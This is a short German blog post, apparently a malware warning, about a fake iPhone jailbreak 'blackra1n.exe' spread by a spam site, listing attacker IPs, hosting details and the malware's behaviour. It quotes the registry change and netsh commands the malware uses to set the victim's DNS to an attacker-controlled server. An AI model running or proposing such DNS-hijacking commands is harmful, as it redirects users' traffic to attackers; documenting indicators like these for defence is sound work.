Aufgepasst… iPhone bashing wird langsam zur Mode. Die Spamer von iphone-iphone.info (188.210.236.181) versuchen unversierte User eine Malware blackra1n.exe (188.210.236.109) unterzujubeln. Blos leider bekommt man statt einen Jailbreak nur Ärger…
188.210.236.250 (188-210-236-250.hotnet.ro), AS39443, HOTNET-AS SC Hot Net SRL Baia de Aries, Nr 3, Bl 5B, Sc A, Ap 39, Bucuresti, 6.
Die enthaltene Batch verändert die DNS Einstellungen…
Registry Eintrag:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{5D19E473-BE30-416B-B5C7-D8A091C41D2F} "NameServer" = 188.210.236.250Der Prozess:
(C:\WINDOWS\system32\NETSH.EXE: interface ip set dns "Local Area Connection" static 188.210.236.250) As User: () Creation Flags: (CREATE_DEFAULT_ERROR_MODE CREATE_SUSPENDED) interface ip set dns "wireles network connection" static 188.210.236.250) As User: () Creation Flags: (CREATE_DEFAULT_ERROR_MODE CREATE_SUSPENDED)
Also aufpassen wenn ihr was in die Richtung machen wollt…